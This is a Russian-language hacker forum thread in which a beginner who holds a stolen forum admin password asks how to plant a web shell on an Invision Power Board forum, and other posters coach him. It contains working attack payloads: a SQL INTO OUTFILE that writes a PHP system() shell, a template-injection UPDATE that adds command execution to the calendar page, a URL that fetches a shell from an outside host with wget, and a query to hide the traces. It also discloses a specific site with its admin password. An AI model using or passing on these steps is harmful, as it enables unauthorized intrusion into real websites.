Вот, получил пароль админа, залил шелл через смайлы потом если через /forum/html/emoticons/antichatl.php перехожу то меня перекидывает на http://err.agava.ru/vh/cgierr/17/ Испровобал 2 шелла nts21Viev.php кажется такое еще... Что мне делать? Как мне быть?
Ну да ну да... Не пинайте меня, я ведь новичек совсем, надо ведь чему то учиться?) А так я решил так как не было The uploading failed как было во всех предыдущих форумах... Не могу в MySQL найти никак, можете подсказать где именно? (phtml)
В настройках нет атачей, так что я не могу прописать application/octet-stream и phtml Через смайлы выходит что ничего не добавляется Добавления настроек там вообще нет.. Просмотрел все темы про заливку шелла но ни один не подошел... Потому собственно и спрашиваю...( ЗЫ Замена HTML шаблона не проходит тоже...(
Значит плохо искал, в ипб 1.* есть способ заливки через MySQL, поищи яуже не раз писал про этот метод
Почему то когда пытался залить в папку uploads вывалило Access denied for user: 'anabole8_admbd@localhost' (Using password: YES) Как от этого избавиться? Команда была такой: SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user INTO OUTFILE '/home/anabole8/public_html/forum/uploads/shell.php'
Лучше попытайся залить в папку с аватарками, на заливку в /uploads/ у тебя может быть нет прав. аа, ты через скуль заливал... скорее всего и правда прав на инто+аутфайл нету.
Это означает, что пользователь anabole8_admbd не имеет доступа в системную таблицу mysql или прав на исполнение команды OUTFILE. Скорее всего второе.
селекти из таблицы форума любой. Утебя нет прав на системные тадлицы. т.е. твой юзер не является рутовым,что обычно нужно для Mysql.user
Ну тогда выходит залить шелл на этот форум нереально? Ну тогда сами посмотрите если хотите... www.anabolex.ru/forum admin : yehakqag Буду другие форумы значит искать((
тебе БР написал выше, селект делать нужно из любой существующей таблицы форума, т.к. мускул запущен не из под рута, доступа к mysql.user нету. Но если честно, я очень сомневаюсь, что у тебя есть аутфайл-права.
Нет, не идет, всеравно нет прав( Ни в аватарки ни из другой таблицы, да и все вместе не работает Я уже 6 форумов нашел, проверю там, может что получится... По крайней мере на одном было точно также, а на другом я вообще не смог зайти в админку... Были только нарисованы два квадрата и < между ними...
Нет, я еще один способ забыл=) Через календарь, запрос прошел, а именно: update ibf_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form"; Но я не понял что за календарь и как там вводить команды? Объясните пожалуйста, я уже близок к заливке шелла хоть?) И еще, я так понят там надо с сайта заливать, ну так вот, сможете плз дать ссылку если у вас гдето залито а то щас с народом рабираться еще,.. Заранее огромное спасибо ввиде +)
Ссылка на календарь находиться в правом верхнем углу ( или по такой ссылки http://host/path_to_forum/index.php?act=calendar) идем в админку, выбираем Управление SQL -> Средства MySQL. Внизу страницы будет поле самостоятельный запрос, туда пишем Code: update ibf_skin_templates set func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb" where func_name="calendar_start_form"; ibf - префикс, который может меняться Жмем запустить запрос,если все прошло удачно видим Execute successfully( по русски не помню как будет) Дальше идем в системные настройки -> главная конфигурация. Там выбираем Использовать безопасный режим скинов? Да. Идем в календарь, как туда попасть писал выше. Что бы юзать команды, делаем так: http://host/path_to_forum/index.php?act=calendar&c=id Скрываем наши следы: Для этого снимаем безопасный режим для скинов и запускаем такой запрос: Code: update 120_skin_templates set func_name="calendar_start_form" where func_name="aaa(){}}; system($_REQUEST[c]); class qwerty{function bbb"; Иногда этот метод не работает!
http://host/path_to_forum/index.php?act=calendar&c=id А дальше писать get... где? В самой ссылке или в добавлении нового события?) Если в ссылке то напиши ссылку пример пожалуйста...
пиешь так http://host/path_to_forum/index.php?act=calendar&c=cd uploads;wget site.ru/shell.php;ls идешь сюда http://host/path_to_forum/uploads/shell.php
Чтобы темы не создавать новой, есть ли команда для заливки шелла с компа а не с сайта, а то возьться с сайтом лень так..